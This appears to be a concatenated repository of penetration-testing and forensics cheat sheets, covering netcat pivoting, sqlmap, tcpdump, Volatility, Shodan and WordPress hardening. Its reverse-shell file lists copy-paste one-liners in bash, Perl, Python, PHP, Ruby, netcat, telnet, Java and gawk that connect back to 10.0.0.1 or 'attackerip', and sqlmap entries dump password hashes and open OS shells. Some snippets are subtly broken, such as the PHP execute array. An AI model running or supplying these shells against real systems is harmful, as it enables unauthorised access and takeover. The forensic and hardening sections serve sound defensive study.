Dec 9 3:34 /etc/shadow 8 | num-links owner group inode-number date/time file-name 9 | 10 | # chmod 11 | Each rwx is either 0/1 (true or false) 12 | Convert to decimal 13 | chmod ### filename 14 | 15 | ## Example: rwx rw- r-- 16 | chmod 764 filename 17 | -------------------------------------------------------------------------------- /php: -------------------------------------------------------------------------------- 1 | # andrew 2 | # basic sql injection prevention 3 | $sth = $db->prepare("SELECT * FROM table WHERE username=? and password=?"); 4 | $sth->execute([$pUsername $pPassword]); 5 | $results = $stmt->fetchAll(PDO:FETCH_ASSOC); 6 | 7 | # basic xss prevention 8 | strip_tags(string); # http://www.php.net/manual/en/function.strip-tags.php 9 | 10 | ## can also allow certain tags: 11 | strip_tags(string, allowed_tags); 12 | 13 | # strip out HTML and special characters 14 | # source: http://stackoverflow.com/questions/7128856/strip-out-html-and-special-characters 15 | $clear = trim(preg_replace('/ +/', ' ', preg_replace('/[^A-Za-z0-9 ]/', ' ', urldecode(html_entity_decode(strip_tags($des)))))); 16 | -------------------------------------------------------------------------------- /pivoting: -------------------------------------------------------------------------------- 1 | # alex 2 | 3 | # To make a FIFO in the file system 4 | mknod [name of file] p 5 | 6 | # Pivoting with a backpipe # 7 | # On the attacker: 8 | nc [pivot host] 9 | 10 | # On the pivot host 11 | nc localhost 80 <[FIFO file name] | nc -l -p 4444 >[FIFO file name] 12 | 13 | # Telnet variant (when netcat is not available on the target) # 14 | # Listen on port 80 in terminal 1 on the attack machine 15 | nc -l -n -v -p 80 16 | 17 | # Listen on port 443 in terminal 2 on the attack machine 18 | nc -l -n -v -p 443 19 | 20 | # On the target machine: 21 | telnet [attack host] 80 | /bin/bash | telnet [attack host] 22 | 23 | -------------------------------------------------------------------------------- /ps: -------------------------------------------------------------------------------- 1 | # alex 2 | # To list every process on the system: 3 | ps aux 4 | 5 | # To list a process tree 6 | ps axjf 7 | 8 | # To list every process owned by foouser: 9 | ps -aufoouser 10 | 11 | # To list every process with a user-defined format: 12 | ps -eo pid,user,command 13 | 14 | # List the processes being run by a particular set of usernames 15 | ps -f -u username1, username2, .... ,usernameN 16 | 17 | # Display a list of processes with a particular parent ID (5589) 18 | # Note that when a process is launched it may spawn several other sub processes which all share a common parent process ID 19 | ps -f -ppid 5589 20 | 21 | # List processes with given PIDs 22 | ps -f -p 25001, 4567, 789 23 | 24 | # Display all processes owned by the current user 25 | ps -U $USER 26 | 27 | # Sort processes based on CPU and memory usage (useful for finding memory leaks) 28 | ps aux --sort pmem 29 | -------------------------------------------------------------------------------- /python: -------------------------------------------------------------------------------- 1 | # alex 2 | 3 | # Network Programming Basics (Python) 4 | 5 | # To use the socket module 6 | import socket 7 | 8 | # To create a new socket object 9 | sock = socket.socket() 10 | 11 | # To get your local machine's name 12 | host = socket.gethostname() 13 | 14 | # To declare a port for your service 15 | port = 80 16 | 17 | # To bind a (hostname, port number) pair to a socket 18 | sock.bind(host, port) 19 | 20 | # To set up and start a TCP listener (wait for client connection) 21 | sock.listen() 22 | 23 | # To accept a connection 24 | # Note: accept() returns a (conn, address) pair where conn is a new socket object that can be used to send/receive data on the connection. Address refers to the address bound on the other end of the connection. 25 | connection, address = sock.accept() 26 | 27 | # To transmit a TCP message (continuing from previous example) 28 | connection.send('Message goes here') 29 | 30 | # To transmit a UDP message 31 | # Note: the socket should not be connected to a remote socket because we are specifying the destination address 32 | connection.sendto('Message goes here', destination_address) 33 | 34 | # To close the connection 35 | connection.close() 36 | 37 | # To receive TCP data from a socket (assuming s is the socket on the client side). 1024 is the buffer size and data is a string. 38 | data = s.recv(1024) 39 | 40 | # To receive UDP data from a socket 41 | # Note: recvfrom() returns a (string, address) pair, where string is the data received and address represents the address of the socket from which the message was sent. 42 | data, addr = s.recvfrom() 43 | 44 | # To get a remote address that a socket is connected to 45 | sock.getpeername() 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /reverse-shell: -------------------------------------------------------------------------------- 1 | # Reverse Shell Cheat Sheet 2 | # Uses info from: 3 | # http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 4 | # http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 5 | # http://www.gnucitizen.org/blog/reverse-shell-with-bash/ 6 | 7 | If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. 8 | 9 | If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former. 10 | 11 | Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. 12 | 13 | The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”. 14 | 15 | Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable. 16 | 17 | # Bash 18 | Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): 19 | 20 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 21 | OR 22 | exec /bin/bash 0&0 2>&0 23 | OR 24 | 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 25 | OR 26 | exec 5<>/dev/tcp/attackerip/4444 27 | cat <&5 | while read line; do $line 2>&5 >&5; done # or: 28 | while read line 0<&5; do $line 2>&5 >&5; done 29 | 30 | 31 | # PERL 32 | Here’s a short, feature-free version that depends on /bin/sh: 33 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 34 | 35 | Shorter Perl reverse shell that does not depend on /bin/sh: 36 | perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 37 | 38 | If the target system is running Windows use the following one-liner: 39 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 40 | 41 | 42 | # Python 43 | This was tested under Linux / Python 2.7: 44 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 45 | 46 | 47 | # PHP 48 | This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6… 49 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 50 | 51 | 52 | # Ruby 53 | Short version that depends on /bin/sh: 54 | ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 55 | 56 | Longer Ruby reverse shell that does not depend on /bin/sh: 57 | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 58 | 59 | If the target system is running Windows use the following one-liner: 60 | ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 61 | 62 | 63 | # Netcat 64 | Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. 65 | nc -e /bin/sh 10.0.0.1 1234 66 | 67 | If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this: 68 | rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f 69 | 70 | Others possible Netcat reverse shells, depending on the Netcat version and compilation flags: 71 | nc -c /bin/sh attackerip 4444 72 | OR 73 | /bin/sh | nc attackerip 4444 74 | OR 75 | rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p 76 | 77 | 78 | # Telnet 79 | Of course, you can also use Telnet as an alternative for Netcat: 80 | rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 81 | Or: 82 | telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp 83 | 84 | 85 | # Java 86 | r = Runtime.getRuntime() 87 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 88 | p.waitFor() 89 | 90 | 91 | # gawk 92 | #!/usr/bin/gawk -f 93 | 94 | BEGIN { 95 | Port = 8080 96 | Prompt = "bkd> " 97 | 98 | Service = "/inet/tcp/" Port "/0/0" 99 | while (1) { 100 | do { 101 | printf Prompt |& Service 102 | Service |& getline cmd 103 | if (cmd) { 104 | while ((cmd |& getline) > 0) 105 | print $0 |& Service 106 | close(cmd) 107 | 108 | 109 | # xterm 110 | One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001. 111 | xterm -display 10.0.0.1:1 112 | 113 | To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): 114 | Xnest :1 115 | 116 | You’ll need to authorise the target to connect to you (command also run on your host): 117 | xhost +targetip -------------------------------------------------------------------------------- /ruby: -------------------------------------------------------------------------------- 1 | # andrew 2 | # currently learning ruby - a few things that I keep forgetting 3 | # sockets 4 | require 'socket' 5 | hostname = localhost 6 | port = 1337 7 | s = TCPSocket.open(hostname, port) 8 | s.close 9 | 10 | # for loops 11 | 5.times do |i| 12 | #do something 13 | end 14 | array.each { |n| #do something } 15 | 16 | # files 17 | file = File.open("filename", "rb") 18 | contents = file.read 19 | file.close 20 | 21 | # sending emails 22 | require 'net/smtp' 23 | message = < 25 | To: 26 | Subject: 27 | 28 | Message! 29 | MESSAGE_END 30 | 31 | smtp = Net::SMTP.new 'smtp.gmail.com', 587 32 | smtp.enable_starttls 33 | smtp.start('gmail.com', '', '', :login) 34 | smtp.send_message message, '', '' 35 | smtp.finish 36 | 37 | # delays 38 | sleep n #number of seconds 39 | 40 | # interact with webpages 41 | require 'net/http' 42 | source = Net::HTTP.get('www.example.com', '/dir/index.html') 43 | -------------------------------------------------------------------------------- /shadow: -------------------------------------------------------------------------------- 1 | # andrew 2 | # location 3 | /etc/shadow 4 | 5 | # fields 6 | username 7 | salt and hashed password 8 | days since epoch of last password change 9 | days until a change is allowed 10 | days before a change is required 11 | days warning for expiration 12 | days before account is inactive 13 | days since epoch when account expires 14 | reserved 15 | 16 | # more on the salt/hashed password 17 | $id$salt$hash 18 | 1: MD5 19 | 2a: Blowfish 20 | 5: SHA-256 21 | 6: SHA-512 22 | -------------------------------------------------------------------------------- /shodan: -------------------------------------------------------------------------------- 1 | # andrew 2 | # Filter IP range 3 | net: 4 | 5 | # Filter port 6 | port: 7 | 8 | # Filter location 9 | city:"" country: 10 | geo: 11 | 12 | # Filter hostname 13 | hostname: 14 | 15 | # Filter operating system 16 | os: 17 | 18 | # Filter dates 19 | # Acceptable formats are: day/month/year or day-month-year 20 | before: 21 | after: 22 | -------------------------------------------------------------------------------- /sqlmap: -------------------------------------------------------------------------------- 1 | # andrew 2 | # Jose Moruno 3 | 4 | #Automated sqlmap scan 5 | ./sqlmap -u http://site.com--forms --batch --crawl=2 --cookie= --level=5 --risk=3 6 | 7 | # Test URL and POST data and return database banner (if possible) 8 | ./sqlmap.py --url="" --data="" --banner 9 | 10 | # Parse request data and test | request data can be obtained with burp 11 | ./sqlmap.py -u 12 | 13 | # Use random agent 14 | ./sqlmap.py -u --random-agent 15 | 16 | # Fingerprint | much more information than banner 17 | ./sqlmap.py -u --fingerprint 18 | 19 | # Identify WAF 20 | ./sqlmap.py -u --check-waf/--identify 21 | 22 | # Get database username, name, and hostname 23 | ./sqlmap.py -u --current-user --current-db --hostname 24 | 25 | # Check if user is a database admin 26 | ./sqlmap.py -u --is-dba 27 | 28 | # Get database users and password hashes 29 | ./sqlmap.py -u --users --passwords 30 | 31 | # Enumerate databases 32 | ./sqlmap.py -u --dbs 33 | 34 | # List tables for one database 35 | ./sqlmap.py -u -D --tables 36 | 37 | # Other database commands 38 | ./sqlmap.py -u -D --columns 39 | --schema 40 | --count 41 | # Enumeration flags 42 | ./sqlmap.py -u -D 43 | -T 44 | -C 45 | -U 46 | 47 | # Extract data 48 | ./sqlmap.py -u -D -T -C --dump 49 | 50 | # Execute SQL Query 51 | ./sqlmap.py -u --sql-query="" 52 | 53 | # Append/Prepend SQL Queries 54 | ./sqlmap.py -u --prefix="" --suffix="" 55 | 56 | # Get backdoor access to sql server | can give shell access 57 | ./sqlmap.py -u --os-shell 58 | -------------------------------------------------------------------------------- /tcpdump: -------------------------------------------------------------------------------- 1 | # alex 2 | 3 | ############### 4 | # Basic Usage # 5 | ############### 6 | 7 | #Capture packets on a particular interface (eth0) 8 | #Note that tcpdump (without the '-i eth0') is also valid if you are only using one interface 9 | tcpdump -i eth0 10 | 11 | #Capture packets with more detailed output 12 | tcpdump -i eth0 -nnvvS 13 | 14 | #Display captured packets in both HEX and ASCII format 15 | tcpdump -XX -i eth0 16 | 17 | #Write captured packets into a file (can be read by tools such as Wireshark, Snort, etc) 18 | tcpdump -w yourfilename.pcap -i eth0 19 | 20 | #Read packets from a saved packet capture file 21 | tcpdump -tttt -r yoursavedfile.pcap 22 | 23 | #Display IP addresses instead of hostnames when capturing packets 24 | tcpdump -n -i eth0 25 | 26 | #Capture packets from a particular source/destination IP address 27 | tcpdump src 192.168.1.1 28 | tcpdump dst 192.168.1.1 29 | 30 | #Capture packets from a particular source/destination port number 31 | tcpdump src port 53 32 | tcpdump dst port 21 33 | 34 | #Capture an entire network's traffic using CIDR notation 35 | tcpdump net 192.168.1.0/24 36 | 37 | #Capture traffic to or from a port 38 | tcpdump port 3389 39 | 40 | #Display captured packets above or below a certain size (in bytes) 41 | tcpdump less 64 42 | tcpdump greater 256 43 | 44 | 45 | ################## 46 | # Advanced Usage # 47 | ################## 48 | 49 | #More complex statements can be formed with the use of logical operators: and(&&), or(||), not(!) 50 | #Examples: 51 | 52 | #Capture all traffic from 192.168.1.10 with destination port 80 (with verbose output) 53 | tcpdump -nnvvS and src 192.168.1.10 and dst port 80 54 | 55 | #Capture traffic originating from the 172.16.0.0/16 network with destination network 192.168.1.0/24 or 10.0.0.0/8 56 | tcpdump src net 172.16.0.0/16 and dst net 192.168.1.0/24 or 10.0.0.0/8 57 | 58 | #Capture all traffic originating from host H1 that isn't going to port 53 59 | tcpdump src H1 and not dst port 22 60 | 61 | #With some complex queries you may have to use single quotes to ignore special characters, namely parentheses 62 | #Capture traffic from 192.168.1.1 that is destined for ports 80 and 21 63 | tcpdump 'src 192.168.1.1 and (dst port 80 or 21)' 64 | -------------------------------------------------------------------------------- /tshark: -------------------------------------------------------------------------------- 1 | #Jose Moruno Cadima 2 | # The Cheat sheet is under construction 3 | # Update 08/09/2015 4 | 5 | 6 | 7 | #Filter with specific IP 8 | tshark -i eth0 host 127.0.0.1 9 | 10 | #Filter with port 11 | tshark -i eth0 host 127.0.0.1 and port 8080 12 | 13 | #Time duration capture 14 | tshark -i eth0 -a duration:5 -w traffic.pcap 15 | -i to choose the interface on your machine. 16 | -a for duration which is in seconds. 17 | -w to write the capture packets in the file. 18 | 19 | # Capture all udp traffic 20 | tshark udp 21 | 22 | #Tshark trace incoming HTTP requests 23 | tshark -i eth0 -R 'http.request' 24 | 25 | #Filter whit HTTP 26 | tshark -r capture.pcap -Y’http’ 27 | -------------------------------------------------------------------------------- /volatility: -------------------------------------------------------------------------------- 1 | #Memory Forensics CheatSheet (WINDOWS) 2 | #Resource - SANS Memory Forensic Cheat Sheet v1.2 3 | #Jason Soto 4 | 5 | ============================================================ 6 | #Memory Analysis Tools 7 | 8 | # Volatility (Windows/Linux/Mac) 9 | https://code.google.com/p/volatility/ 10 | 11 | #Mandiant Redline (Windows) 12 | http://www.mandiant.com/resources/download/redline 13 | 14 | #VolaFox (Mac OS / BSD) 15 | https://github.com/n0fate/volafox 16 | 17 | ============================================================== 18 | #Volatility Basics 19 | The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples 20 | 21 | #Location in Kali Linux 22 | /usr/share/volatility/vol.py 23 | 24 | #Examples 25 | #Show Options and Supported plugins 26 | $ vol.py -h 27 | 28 | #Show plugin usage 29 | $ vol.py -h 30 | 31 | #Identify System Profile 32 | $ vol.py -f mem.img imageinfo 33 | ============================================================== 34 | #Identify Rogue Process 35 | #High level view of running processes 36 | $ vol.py pslist -f mem.img 37 | 38 | #Scan memory for EPROCESS Blocks 39 | $ vol.py psscan -f mem.img 40 | 41 | #Display parent-process relationships 42 | $ vol.py pstree -f mem.img 43 | =============================================================== 44 | #Look for Evidence of Code Injection 45 | #malfind 46 | -p show information only for specific PIDs 47 | -o Provide physical offset if single process to scan 48 | --dump-dir Directory to save memory section 49 | 50 | $ vol.py malfind --dump-dir ./output_dir 51 | 52 | #ldrmodules 53 | $ vol.py ldrmodules -p 868 -v 54 | =============================================================== 55 | #Check for Signs of a Rootkit 56 | #Examples 57 | 58 | #Find Hidden processes using cross-view 59 | $ vol.py psxview 60 | 61 | #Scan Memory for loaded, unloaded and Unlinked drivers 62 | $ vol.py modscan 63 | 64 | #Find API/DLL Function hooks 65 | $ vol.py apihooks 66 | $ vol.py apihooks -p 868 (Specific PID) 67 | $ vol.py apihooks -Q (Only Critical Processes) 68 | 69 | #Hooks in System Service Descriptor Table 70 | $ vol.py ssdt | grep -v '(ntoskrnl|win32k)' 71 | 72 | #Display Interrupt Descriptor Table 73 | $ vol.py idt 74 | 75 | #Identify I/O Request Packet (IRP) hooks 76 | $ vol.py driverip -r tcpip 77 | ================================================================ 78 | #Analyze Process DLLs and Handles 79 | #Examples 80 | 81 | #List of loaded dlls by process 82 | $ vol.py dlllist -p 4,868 83 | 84 | #Print process security indentifiers 85 | $ vol.py getsids -p 868 86 | 87 | #List of open handles for each process 88 | -t Display handles of a certain type 89 | {Process, Thread, Key, Event, File, Mutant, Token, Port} 90 | $ vol.py handles -p 58 -t Process, Mutant 91 | 92 | #Scan memory for FILE_OBJECT handles 93 | $ vol.py filescan 94 | 95 | #Scan for Windows Service Information 96 | $ vol.py svcscan 97 | ================================================================ 98 | #Dump Suspicious Processes and Drivers 99 | #Examples 100 | 101 | #Extract DLLs from Specific Processes 102 | #dlldump 103 | -p Dump DLLs only for specific PIDs 104 | -b Dump DLLs from process at physical memory offset 105 | -r Dump DLLs matching REGEX name 106 | --dump-dir Directory to save extracted files 107 | 108 | $ vol.py dlldump --dump-dir ./output –r metsrv 109 | 110 | #Extract kernel drivers 111 | #moddump 112 | -o Dump driver using offset address (from modscan) 113 | -r Dump drivers matching REGEX name 114 | --dump-dir Directory to save extracted files 115 | 116 | $ vol.py moddump --dump-dir ./output –r gaopdx 117 | 118 | #Dump process to executable sample 119 | #procmemdump 120 | -p Dump only specific PIDs 121 | -o Specify process by physical memory offset 122 | --dump-dir Directory to save extracted files 123 | 124 | $ vol.py procmemdump --dump-dir ./output –p 868 125 | 126 | #Dump every memory section into a file 127 | -p Dump memory sections from these PIDs 128 | --dump-dir Directory to save extracted files 129 | 130 | $ vol.py memdump –dump-dir ./output –p 868 131 | ================================================================ 132 | #Review Network Artifacts 133 | #Examples 134 | 135 | #[XP] List of open TCP connections 136 | $ vol.py connections 137 | 138 | #[XP] ID TCP connections, including closed 139 | $ vol.py connscan 140 | 141 | #[XP] Print listening sockets (any protocol) 142 | $ vol.py sockets 143 | 144 | #[XP] ID sockets, including closed/unlinked 145 | $ vol.py sockscan 146 | 147 | #[Win7] Scan for connections and sockets 148 | $ vol.py netscan 149 | 150 | ================================================================ 151 | 152 | #Memory Acquisition 153 | #Windows Operating Systems 154 | # Win32dd (x86) / Win64dd (x64) 155 | 156 | #Example 157 | c:\> win32dd.exe /f E:\memory.img 158 | 159 | #MemoryDD.bat 160 | 161 | #Example 162 | c:\> MemoryDD.bat --output E:\ 163 | 164 | #Volatily WinPmem 165 | #Options 166 | - output to standard out 167 | -l Load driver for live memory analysis 168 | 169 | ================================================================= 170 | #Converting Hibernation Files and Crash Dumps 171 | #Volatility imagecopy 172 | #Options 173 | -f Name of Source File 174 | -O Output file Name 175 | --profile Source OS from imageinfo 176 | 177 | #Examples 178 | $ vol.py imagecopy -f hiberfil.sys -O hiber.img --profile=Win7SP1x64 179 | $ vol.py imagecopy -f Memory.dmp -O memdmp.img --profile=Win7SP1x64 180 | 181 | =================================================================== 182 | #Memory Artifact Timelining 183 | 184 | #The Volatility Timeliner plugin parses time-stamped objects found in memory images. Output is sorted by: 185 | Process creation time 186 | Thread creation time 187 | Driver compile time 188 | DLL / EXE compile time 189 | Network socket creation time 190 | Memory resident registry key last write time 191 | Memory resident event log entry creation time 192 | 193 | #timeliner 194 | ‐‐output‐file Optional file to write output (v2.1) 195 | ‐‐output=body bodyfile format for mactime (v2.3) 196 | 197 | $ vol.py -f mem.img timeliner --output-file out.csv --profile=Win7SP1x86 198 | 199 | ===================================================================== 200 | # Registry Analysis Volatility Plugins 201 | #hivelist - Find and list available registry hives 202 | $ vol.py hivelist 203 | 204 | #hivedump - Print all keys and subkeys in a hive 205 | -o Offset of registry hive to dump (virtual offset) 206 | $ vol.py hivedump –o 0xe1a14b60 207 | 208 | #printkey - Output a registry key, subkeys, and values 209 | -K “Registry key path” 210 | $ vol.py printkey –K “Software\Microsoft\Windows\CurrentVersion\Run” 211 | 212 | #userassist - Find and parse userassist key values 213 | $ vol.py userassist 214 | 215 | #hashdump - Dump user NTLM and Lanman hashes 216 | -y Virtual offset of SYSTEM registry hive (from hivelist) 217 | -s Virtual offset of SAM registry hive (from hivelist) 218 | $ vol.py hashdump –y 0x8781c008 –s 0x87f6b9c8 219 | ======================================================================== 220 | 221 | 222 | -------------------------------------------------------------------------------- /webservervulns: -------------------------------------------------------------------------------- 1 | # angela 2 | #Sample Files 3 | Since web servers are hard to make from the ground up, sample files are often in the distributions, and the knowledge of these sample files can provide openings. 4 | 5 | #Source Code Disclosure 6 | Allowing the source code to be viewed can make holes an files accessible if they can can be found referenced in the code. 7 | 8 | #Canonicalization 9 | Errors usually occur when the web server fails to fully carry out the law (that the root word for any URL/filename would be the same if it is for the same resource), and thus the web server will fail to recognize that a URL is associated with a file it addresses. 10 | 11 | #Input Validation 12 | Classic hacking technique, but it can lead to buffer overflows, integer errors, and heap exploits. 13 | 14 | #Denial of Service 15 | Attempting to waste server time to get a denial. For example, one can identify many strings that hash to the same location in an environment with a naive programming language hash table implementation. 16 | -------------------------------------------------------------------------------- /wireless-encryptions: -------------------------------------------------------------------------------- 1 | #Wired Equivalent Privacy (WEP) 2 | RC4 stream cipher w/ CRC32 for integrity check 3 | -->Crack: 4 | by sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs 5 | -->Avoidance: 6 | Use WPA2 7 | 8 | #Wifi Protected Access (WPA) 9 | Temporal Key Integrity Protocol (TKIP) Message Integrity Check 10 | -->Crack: 11 | Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station 12 | -->Avoidance: 13 | Use long-keys 14 | 15 | #WPA2 16 | Advanced Encryption Standard (AES) 17 | -->crack and avoidance the same was WPA -------------------------------------------------------------------------------- /wireshark: -------------------------------------------------------------------------------- 1 | # To start capturing packets on a specified interface 2 | Capture>"Interfaces ...">[Select interface(s)]>Start 3 | 4 | # To stop a running capture to analyze the packets 5 | Capture>Stop 6 | 7 | # To apply a filter from selected packets in a current or previous capture session 8 | [Right click packet]>"Apply as filter">[Select options] 9 | 10 | # To start a session that will only capture packets destined for your device 11 | Capture>"Options...">[Uncheck "Use promiscuious mode on all interfaces"]>Start 12 | 13 | # To view all packets of a TCP/UDP/SSL stream 14 | [Right click packet]>"Follow stream" 15 | 16 | # To manage decryption keys to decrypt encrypted streams 17 | View>"Wireless Toolbar" then 18 | "Wireless Toolbar">"Decryption Keys..." 19 | 20 | -------------------------------------------------------------------------------- /wpHardening: -------------------------------------------------------------------------------- 1 | #WPHardening CheatSheet 2 | #Jason Soto 3 | 4 | #WPHardening is a Security Fortification tool for Wordpress 5 | 6 | #Clone WPHardening Repo 7 | $ git clone https://github.com/elcodigok/wphardening 8 | 9 | #Usage 10 | $ python wphardening -d /path/to/wordpress [options] 11 | 12 | #Options 13 | --version show program's version number and exit 14 | -h, --help show this help message and exit 15 | -v, --verbose Active verbose mode output results 16 | --update Check for WPHardening latest stable version 17 | 18 | Target: 19 | This option must be specified to modify the package WordPress. 20 | 21 | -d DIRECTORY, --dir=DIRECTORY 22 | **REQUIRED** - Working Directory. 23 | --load-conf=FILE Load file configuration. 24 | 25 | Hardening: 26 | Different tools to hardening WordPress. 27 | 28 | -c, --chmod Chmod 755 in directory and 644 in files. 29 | -r, --remove Remove files and directory. 30 | -b, --robots Create file robots.txt 31 | -f, --fingerprinting 32 | Deleted fingerprinting WordPress. 33 | -t, --timthumb Find the library TimThumb. 34 | --wp-config Wizard generated wp-config.php 35 | --delete-version Deleted version WordPress. 36 | --plugins Download Plugins Security. 37 | --proxy=PROXY Use a HTTP proxy to connect to the target url for 38 | --plugins and --wp-config. 39 | --indexes It allows you to display the contents of directories. 40 | --malware-scan Malware Scan in WordPress project. 41 | 42 | Miscellaneous: 43 | -o FILE, --output=FILE 44 | Write log report to FILE.log 45 | 46 | #Examples 47 | #Check a WordPress Project 48 | $ python wphardening.py -d /path/to/wordpress -v 49 | 50 | #Change permissions 51 | $ python wphardening.py -d /path/to/wordpress --chmod -v 52 | 53 | #Remove files that are not in use 54 | $ python wphardening.py -d /path/to/wordpress --remove -v 55 | 56 | #Create your robots.txt file 57 | $ python wphardening.py -d /path/to/wordpress --robots -v 58 | 59 | #Remove all fingerprinting 60 | $ python wphardening.py -d /path/to/wordpress --fingerprinting -v 61 | 62 | #Check for TimThumb library 63 | $ python wphardening.py -d /path/to/wordpress --timthumb -v 64 | 65 | #Create Index files 66 | $ python wphardening.py -d /path/to/wordpress --indexes -v 67 | 68 | #Download Security Plugins 69 | $ python wphardening.py -d /path/to/wordpress --plugins 70 | 71 | #Wizard generated wp-config.php 72 | $ python wphardening.py -d /path/to/wordpress --wp-config 73 | 74 | #Deleted version WordPress 75 | $ python wphardening.py -d /path/to/wordpress --delete-version -v 76 | 77 | #WPHardening update 78 | $ python wphardening.py --update 79 | 80 | #Use all options 81 | $ python wphardening.py -d /home/user/wordpress -c -r -f -t --wp-config --delete-version --indexes --plugins -o /home/user/wphardening.log 82 | 83 | 84 | --------------------------------------------------------------------------------